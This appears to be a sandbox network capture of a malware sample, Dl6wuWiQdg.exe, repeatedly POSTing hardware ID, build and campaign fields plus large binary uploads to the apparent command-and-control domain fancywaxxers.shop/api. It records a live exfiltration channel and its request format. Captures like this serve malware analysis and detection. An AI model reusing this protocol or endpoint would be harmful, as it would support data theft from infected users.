2024-12-31 08:48:30 UTC	1369	IN	Data Raw: 48 30 75 6c 61 52 53 58 45 61 65 42 59 2b 66 79 63 62 63 68 61 51 71 57 6b 2b 49 4f 73 72 37 69 67 54 38 39 4a 2b 4d 4d 48 73 77 50 4f 72 41 30 45 42 64 4a 67 39 55 66 6d 30 35 78 74 67 45 30 46 76 65 44 36 67 75 72 37 38 71 68 61 78 55 72 69 69 6b 37 39 43 39 58 2b 56 45 6b 76 30 48 7a 6f 56 65 7a 2b 6c 32 33 47 55 30 36 75 72 50 71 4c 6f 61 79 2b 34 51 61 42 51 4f 6a 44 45 62 4d 71 33 66 39 43 52 79 72 4a 62 66 77 52 39 4c 79 49 49 73 64 65 43 2f 7a 67 2f 6f 57 68 70 37 4b 74 53 4d 56 4b 38 4a 46 47 39 41 50 66 35 30 64 4f 49 38 56 77 37 31 72 6b 39 49 4e 75 7a 6b 42 4f 74 72 4b 39 77 4f 71 6b 71 75 45 51 67 58 48 33 6b 31 6e 77 52 75 66 36 56 6c 49 76 7a 33 65 6e 54 71 58 72 30 57 58 4d 45 68 50 6b 70 76 4b 48 71 61 79 7a 71 45 54 4d 51 76 6d 47 53 50 Data Ascii: H0ulaRSXEaeBY+fycbchaQqWk+IOsr7igT89J+MMHswPOrA0EBdJg9Ufm05xtgE0FveD6gur78qhaxUriik79C9X+VEkv0HzoVez+l23GU06urPqLoay+4QaBQOjDEbMq3f9CRyrJbfwR9LyIIsdeC/zg/oWhp7KtSMVK8JFG9APf50dOI8Vw71rk9INuzkBOtrK9wOqkquEQgXH3k1nwRuf6VlIvz3enTqXr0WXMEhPkpvKHqayzqETMQvmGSP
2024-12-31 08:48:30 UTC	1369	IN	Data Raw: 5a 30 63 2f 67 6d 53 70 53 4b 76 31 6e 53 4b 59 45 6b 69 6a 6f 2f 79 45 6f 36 2b 39 70 6b 7a 54 54 66 65 52 53 50 49 50 32 2b 42 56 53 53 6e 49 65 75 35 63 35 2f 2b 57 5a 63 39 58 43 2b 72 67 2b 70 62 71 2b 2f 4b 41 52 63 70 4c 71 39 6b 4a 37 45 72 50 72 46 4a 49 5a 4a 6f 37 35 31 76 75 2b 4a 78 68 7a 31 46 5a 70 61 62 76 6a 71 65 70 6f 4b 74 44 78 45 72 39 6a 6b 72 31 41 74 33 67 52 30 30 6b 77 58 43 6e 48 36 76 31 69 53 4b 59 45 6d 69 7a 74 76 65 4a 70 72 57 35 6f 45 76 58 53 75 44 44 42 37 4d 56 30 66 30 56 48 44 4c 53 62 4f 42 4f 70 65 76 52 5a 63 77 53 45 2b 53 6d 39 49 69 74 70 62 79 7a 54 63 64 49 2f 34 70 41 39 77 7a 56 37 46 46 41 49 38 64 34 36 31 72 73 38 5a 35 6d 79 56 78 43 71 2b 43 7a 7a 71 32 37 38 76 6b 49 34 46 7a 7a 6a 30 53 7a 47 35 6a Data Ascii: Z0c/gmSpSKv1nSKYEkijo/yEo6+9pkzTTfeRSPIP2+BVSSnIeu5c5/+WZc9XC+rg+pbq+/KARcpLq9kJ7ErPrFJIZJo751vu+Jxhz1FZpabvjqepoKtDxEr9jkr1At3gR00kwXCnH6v1iSKYEmiztveJprW5oEvXSuDDB7MV0f0VHDLSbOBOpevRZcwSE+Sm9IitpbyzTcdI/4pA9wzV7FFAI8d461rs8Z5myVxCq+Czzq278vkI4Fzzj0SzG5j
2024-12-31 08:48:30 UTC	267	IN	Data Raw: 6f 4a 38 2f 78 47 7a 73 72 46 70 31 6c 64 4d 73 75 4c 49 6a 61 53 74 74 62 63 49 33 6e 69 2b 77 30 62 70 52 49 37 56 54 41 51 6a 7a 6a 75 2f 45 66 37 31 6b 57 58 61 52 45 79 6f 73 66 61 44 70 6f 47 39 70 6c 37 43 53 50 4f 53 51 4c 38 50 32 36 77 62 42 43 50 61 4f 37 38 52 78 50 57 48 59 65 39 52 57 71 33 67 73 38 36 74 74 66 4c 35 43 50 38 48 34 6f 42 5a 38 41 76 48 30 68 55 63 50 66 77 37 37 45 66 73 34 70 4a 30 79 31 39 48 74 5a 36 39 31 76 37 78 34 50 4d 61 6b 31 69 77 6e 48 61 39 52 4e 65 73 44 58 30 39 67 6d 32 6e 43 62 6d 38 30 58 43 41 43 67 76 6a 6f 2b 2b 63 72 4b 43 6b 6f 67 2f 2f 65 64 65 56 51 2f 51 55 30 66 74 61 42 47 71 43 64 4b 63 4a 30 72 4b 59 5a 64 74 44 58 61 6d 77 2b 73 36 56 37 66 4b 35 43 4a 6b 48 78 59 42 48 2f 51 50 41 2f 52 68 6a Data Ascii: oJ8/xGzsrFp1ldMsuLIjaSttbcI3ni+w0bpRI7VTAQjzju/Ef71kWXaREyosfaDpoG9pl7CSPOSQL8P26wbBCPaO78RxPWHYe9RWq3gs86ttfL5CP8H4oBZ8AvH0hUcPfw77Efs4pJ0y19HtZ691v7x4PMak1iwnHa9RNesDX09gm2nCbm80XCACgvjo++crKCkog//edeVQ/QU0ftaBGqCdKcJ0rKYZdtDXamw+s6V7fK5CJkHxYBH/QPA/Rhj
2024-12-31 08:48:30 UTC	1369	IN	Data Raw: 32 63 65 36 0d 0a 45 73 67 46 51 4c 2f 50 4f 7a 7a 71 36 79 38 76 6b 59 6b 78 79 6c 30 42 36 6a 56 73 6d 69 54 41 51 79 67 69 4f 31 48 36 76 67 30 54 71 41 46 55 69 32 73 76 75 4e 76 4b 44 31 6e 33 62 6d 58 66 32 46 58 75 49 36 36 4f 74 50 53 53 4c 56 61 71 74 45 36 50 79 66 5a 64 59 53 42 65 53 76 76 64 61 54 34 2f 72 68 64 34 38 48 36 4d 4d 52 73 7a 48 56 34 6c 74 44 4d 74 4d 32 77 45 76 6d 39 49 5a 7a 67 42 77 4c 6f 75 43 6c 33 4f 54 6a 74 72 41 49 6d 52 65 69 32 42 79 67 55 34 61 2b 53 67 6f 39 67 6d 32 6e 43 62 6d 38 30 58 43 41 43 67 76 6a 6f 2b 2b 63 72 4b 43 6b 6f 67 2f 2f 65 64 36 45 54 2f 59 44 78 71 35 37 54 7a 44 46 4f 36 6b 52 35 4c 4c 4a 57 34 41 61 43 35 76 75 76 5a 62 71 2b 2f 4b 55 53 38 39 4a 39 35 56 59 76 69 72 52 36 6c 42 44 4e 49 42 Data Ascii: 2ce6EsgFQL/POzzq6y8vkYkxyl0B6jVsmiTAQygiO1H6vg0TqAFUi2svuNvKD1n3bmXf2FXuI66OtPSSLVaqtE6PyfZdYSBeSvvdaT4/rhd48H6MMRszHV4ltDMtM2wEvm9IZzgBwLouCl3OTjtrAImRei2BygU4a+Sgo9gm2nCbm80XCACgvjo++crKCkog//ed6ET/YDxq57TzDFO6kR5LLJW4AaC5vuvZbq+/KUS89J95VYvirR6lBDNIB
2024-12-31 08:48:30 UTC	1369	IN	Data Raw: 37 4c 57 59 64 4a 41 54 61 65 32 2f 73 6d 55 6e 5a 57 76 54 38 42 52 34 4a 52 47 7a 54 72 44 37 31 74 4b 49 39 52 71 70 78 2b 72 2f 64 45 36 2b 52 49 44 35 4a 2b 7a 7a 72 4c 6a 36 75 46 39 77 6b 6e 2b 68 46 2f 69 53 66 48 69 55 6b 55 79 30 6d 7a 6f 45 61 57 79 6c 79 4b 59 41 41 58 6b 70 4f 7a 4f 38 76 50 67 2b 68 32 53 45 4b 44 52 56 72 30 64 6c 76 6f 56 48 48 61 4d 4f 2f 55 52 73 37 4c 57 59 64 4a 41 54 61 65 32 2f 73 6d 55 6e 5a 57 76 54 38 42 52 34 4a 52 47 76 43 72 67 7a 57 74 36 4d 63 46 31 36 56 62 39 34 39 45 73 67 46 30 4c 2f 4a 6d 39 78 75 71 63 2f 4f 46 51 67 52 2b 77 74 6b 72 39 43 74 48 36 52 41 6b 44 7a 48 7a 6d 52 2f 76 6c 6e 69 33 75 5a 47 72 6b 37 72 32 49 36 76 76 67 37 77 6a 46 56 72 44 62 47 61 46 66 67 37 38 43 46 48 62 64 4e 66 34 52 Data Ascii: 7LWYdJATae2/smUnZWvT8BR4JRGzTrD71tKI9Rqpx+r/dE6+RID5J+zzrLj6uF9wkn+hF/iSfHiUkUy0mzoEaWylyKYAAXkpOzO8vPg+h2SEKDRVr0dlvoVHHaMO/URs7LWYdJATae2/smUnZWvT8BR4JRGvCrgzWt6McF16Vb949EsgF0L/Jm9xuqc/OFQgR+wtkr9CtH6RAkDzHzmR/vlni3uZGrk7r2I6vvg7wjFVrDbGaFfg78CFHbdNf4R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49715	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:30 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OCZ4PL09TZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12811 Host: fancywaxxers.shop
2024-12-31 08:48:30 UTC	12811	OUT	Data Raw: 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 43 5a 34 50 4c 30 39 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --OCZ4PL09TZContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--OCZ4PL09TZContent-Disposition: form-data; name="pid"2--OCZ4PL09TZContent-Disposition: form-data; name="lid"PsFKDg--pablo--OCZ4PL09TZContent-
2024-12-31 08:48:32 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fu4h94h1vfqrn4uibt646ivlte; expires=Sat, 26 Apr 2025 02:35:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF7gZvX9HfD%2B0F1QQ1raywkqjj1ivYDNVqQxx5bHKy8FmU0TGQxno068r2XxGyngBbNheXRrb6XU0zHbDRjxNz4Ktqfv6rxYCncv3q3fXV%2FeUZl98Du9Pg0oVL83IqQPtB9CQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa902d17b0f729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=995&sent=13&recv=17&lost=0&retrans=1&sent_bytes=4228&recv_bytes=13744&delivery_rate=111403&cwnd=169&unsent_bytes=0&cid=63512e18cb900c5e&ts=1216&x=0"
2024-12-31 08:48:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 08:48:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49716	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:32 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YKZLOSC2307EF33 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15087 Host: fancywaxxers.shop
2024-12-31 08:48:32 UTC	15087	OUT	Data Raw: 2d 2d 59 4b 5a 4c 4f 53 43 32 33 30 37 45 46 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 59 4b 5a 4c 4f 53 43 32 33 30 37 45 46 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4b 5a 4c 4f 53 43 32 33 30 37 45 46 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 4b 5a 4c 4f Data Ascii: --YKZLOSC2307EF33Content-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--YKZLOSC2307EF33Content-Disposition: form-data; name="pid"2--YKZLOSC2307EF33Content-Disposition: form-data; name="lid"PsFKDg--pablo--YKZLO
2024-12-31 08:48:32 UTC	1136	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ebv3t3dsrpmv51s1fsi61vb35d; expires=Sat, 26 Apr 2025 02:35:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fo%2FDRxR2VV5eetTdpMCDUnnHIqre1TJPBbIar5jPJCDjmeZ8Y1Aii26EbbVWVKzGoUBr4%2BYPjwHywbljl4X%2BugOOVXtG94qRwGdgddCmD5g7sXhw3mk%2B9uBxr%2BMVKvaPwM4ElQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa902dc4839424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1616&rtt_var=623&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=16025&delivery_rate=1806930&cwnd=248&unsent_bytes=0&cid=5e385319b8b7a5c0&ts=373&x=0"
2024-12-31 08:48:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 08:48:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49717	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:33 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GN9DL9BSTQOO2N2JQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19957 Host: fancywaxxers.shop
2024-12-31 08:48:33 UTC	15331	OUT	Data Raw: 2d 2d 47 4e 39 44 4c 39 42 53 54 51 4f 4f 32 4e 32 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 47 4e 39 44 4c 39 42 53 54 51 4f 4f 32 4e 32 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4e 39 44 4c 39 42 53 54 51 4f 4f 32 4e 32 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d Data Ascii: --GN9DL9BSTQOO2N2JQContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--GN9DL9BSTQOO2N2JQContent-Disposition: form-data; name="pid"3--GN9DL9BSTQOO2N2JQContent-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-31 08:48:33 UTC	4626	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-12-31 08:48:34 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kdm2g8b537ec7u2pm0cbnv28cr; expires=Sat, 26 Apr 2025 02:35:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OjHyyJNNVnE%2FXlP4udOgjA6eFNN691dPPBETCdeF8vnm%2FVXDBdIm5MpQRVSvEFxMVywVy7WJivGI4sINLbe8k9JbIKVa6D1HVGS74oyTsHGlZ0OoPd2nbNzYeY6sP%2BD2c20Xg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa902e31d12424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1544&rtt_var=598&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=20919&delivery_rate=1802469&cwnd=248&unsent_bytes=0&cid=84a1a98a0b223d3f&ts=535&x=0"
2024-12-31 08:48:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 08:48:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49718	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:34 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3Z6B9YVZ08KHLTIK9O User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1226 Host: fancywaxxers.shop
2024-12-31 08:48:34 UTC	1226	OUT	Data Raw: 2d 2d 33 5a 36 42 39 59 56 5a 30 38 4b 48 4c 54 49 4b 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 33 5a 36 42 39 59 56 5a 30 38 4b 48 4c 54 49 4b 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 5a 36 42 39 59 56 5a 30 38 4b 48 4c 54 49 4b 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f Data Ascii: --3Z6B9YVZ08KHLTIK9OContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--3Z6B9YVZ08KHLTIK9OContent-Disposition: form-data; name="pid"1--3Z6B9YVZ08KHLTIK9OContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-31 08:48:35 UTC	1136	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tvpg7hlidjl227ackp1iqmid6m; expires=Sat, 26 Apr 2025 02:35:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BnmdOu9t8JHzYh6AvxqyfnBaztVWH7T8h5rLKu30%2Bzxl6EOAMLyVKubtedf0DiB2D6JU0u1WVjg%2F%2B0oDJ7WEux7zkTFc8gmXGq2L3ix%2BibTJFW2LX3F2y2UbucXftZujY%2F3Z4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa902eafc96727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1968&rtt_var=744&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2144&delivery_rate=1464393&cwnd=232&unsent_bytes=0&cid=77e99532a8f52fe4&ts=440&x=0"
2024-12-31 08:48:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 08:48:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49725	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:36 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=10I2JPD0I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572170 Host: fancywaxxers.shop
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --10I2JPD0IContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--10I2JPD0IContent-Disposition: form-data; name="pid"1--10I2JPD0IContent-Disposition: form-data; name="lid"PsFKDg--pablo--10I2JPD0IContent-Disp
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58 f7 f4 7b 72 7f 4c ce d7 fd 5a 7f 2a 3d 1c 11 9a 88 dd 55 5a 12 49 12 fd 8a d0 04 03 e6 c7 0a b3 68 b5 7d 48 d2 3f 90 1d ad aa 72 80 fd 04 b7 92 a2 3e b9 79 73 1c d7 27 b6 a6 Data Ascii: 0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX{rLZ*=UZIh}H?r>ys'
